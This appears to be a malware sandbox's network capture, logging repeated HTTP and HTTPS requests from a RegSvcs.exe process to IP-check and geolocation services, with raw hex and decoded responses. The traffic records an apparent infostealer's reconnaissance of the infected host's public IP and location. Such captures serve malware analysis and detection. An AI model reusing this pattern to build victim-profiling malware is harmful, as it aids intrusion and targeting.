Oct 29, 2024 10:32:24.820432901 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d3b49ddd9a822b8ed72a909234f38bd7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49744	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:25.666497946 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:26.538157940 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:26 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fb8d909b765661a8f5dc1371543c3962 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49746	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:27.425142050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:28.300967932 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: df8ddc29d5d8c493a1417c772857c9c8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:10 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:10 UTC	884	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:10 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1840 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhIVCX9AMXMqa1SeKWGdksjz23eS1IKyRrBntpoZroIOeam37FFMo1rZ%2FsM8ubJS0x6hp7pEzmNjjR%2FCUAJPaEsPmLCTWRF%2BqRbnPjrTjviirkL616AwXTXQhDWG7CJsj4yAkDFT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2282398d6486d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1756215&cwnd=248&unsent_bytes=0&cid=8781660eb3186299&ts=264&x=0"
2024-10-29 09:32:10 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:11 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:32:11 UTC	886	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:11 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1841 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hkzrCpgupquaGsDEBHuyYaPC3vvwLx9HEJYrluMoU6c0XhrF0fDUFOjWDPVtA9hBUcSzAgMrLJOkTW9Hg9RfwhrO%2FjHdIfZ%2FZnUNTYqpQXvUga%2BWVIHZL4MQLRb3bbhkH6fF%2F59l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2282b88ff4770-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1610678&cwnd=251&unsent_bytes=0&cid=4c45695a09390820&ts=151&x=0"
2024-10-29 09:32:11 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:13 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:13 UTC	892	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:13 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1843 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvlBGXFCugj2GTeF%2Bl0VoU3RVJ8TzMDzpULy%2F96fi23Bgq49pXzrUd7vz6YsP5s2pProwuVsAwBD%2Bsc5ND%2BY8%2BK1ASV4zLpF0Il6wUuZ5rj%2B5hfjPlQbdLXKgUuDRgbNT%2FibgXJ1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da22835fb033593-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1058&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2599640&cwnd=251&unsent_bytes=0&cid=72de9fce6407ca82&ts=155&x=0"
2024-10-29 09:32:13 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49715	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:13 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:14 UTC	884	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:13 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1843 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gH8NmjeGH8XsjZ4C3SvONFc0MVXjFhgiR%2Bga1x1rtlzLYlFSqJ1ISnzf%2F7XEvZgD9vIvh0YgdNX0ihe7GioqP4SYckA1HKsKTtjZ%2BomCMeDLwH9WJz3Ep8C76a8hHRvlTtCuLwv3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2283b2fc96b0b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2588025&cwnd=251&unsent_bytes=0&cid=773330e733a2fa9a&ts=205&x=0"
2024-10-29 09:32:14 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49717	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:14 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:32:14 UTC	890	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:14 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1844 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzvEVxIR92SNkgjHGcy%2BsVM%2BYOqqjmDYhUeExcb7f%2FqjFg5dYrByTljk5if34acK%2FzZo6NjwFHv4aWb5ypEHPCT20RROumzQvc3M%2Bb4WfaVllBVZzA4o1wp%2FykKA0yneuj3eQX0Q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da228412b10479a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2594982&cwnd=252&unsent_bytes=0&cid=c145982485343619&ts=145&x=0"
2024-10-29 09:32:14 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49719	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:15 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:32:16 UTC	892	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:16 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1846 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fw3GgddxUl7AcckOblkEwC64OoEKwr9MbOKoOgJ9c8O0dysS66naoj6PEt1rsrrcQSQVfIyG17SNkxgTtlk15nJaZ6%2BM%2FMW%2BBFbE5b%2FRUi%2F7ohV1%2Fu2yy0PNPjm%2Bcg03IemRqSqf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da22847f8ba466b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1127&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2468883&cwnd=251&unsent_bytes=0&cid=ac1e1daecc72483b&ts=147&x=0"
2024-10-29 09:32:16 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49720	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:16 UTC	87	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-29 09:32:16 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:16 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1846 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uqABg5aWPyfxo2RAm9DTyp1ZWpgB8HZ7TIJjmIpnIt62msnJ5F86i0c0UNsiDIRP2PIDUP4xd8otcfAAqYN3oKP9jD0nSeKLmlASyQkbf63dcHN81QY058%2FEvtzVR8QnOQsS7GT%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2284b7c49144a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2423430&cwnd=219&unsent_bytes=0&cid=5a06682894668e71&ts=149&x=0"
2024-10-29 09:32:16 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49723	188.114.97.3	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:17 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:32:17 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:17 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1847 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEaAnTaqDuS9Vcxk4bYTPJlXq68%2BbXnvblcytPxOFMuxzL4oSsEiShxNFQgZUCVlvMAvvEttMtoBSdF5ohsYBIF6xxRg5GpUdpz88LBJM8Hcsjdwpk2tvNb6OQ0HuDho5Z1Uvxaq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da2285328ba878a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2576512&cwnd=235&unsent_bytes=0&cid=7ad52d0e999ffae2&ts=283&x=0"
2024-10-29 09:32:17 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49724	188.114.97.3	443	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:18 UTC	63	OUT	GET /xml/173.254.250.72 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-29 09:32:18 UTC	894	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:18 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AZ6gpggEPHcESXQ= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1848 Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F7oh0faHoal4jLftLzfvn5WsbAz7tJvBN4xcUsco%2FVxM8Hhw7PXJUEn3GznAlvDpkMeexIXPAUkui6aLTNoS5%2BpXttqAVlzo%2F0%2Bo9FBwKOkW9cdq%2F%2B8IDMH2JivGDxo%2FY%2BqyAFNe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da228567de36b1d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1216&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1815673&cwnd=251&unsent_bytes=0&cid=8709d26db99a8fb1&ts=154&x=0"
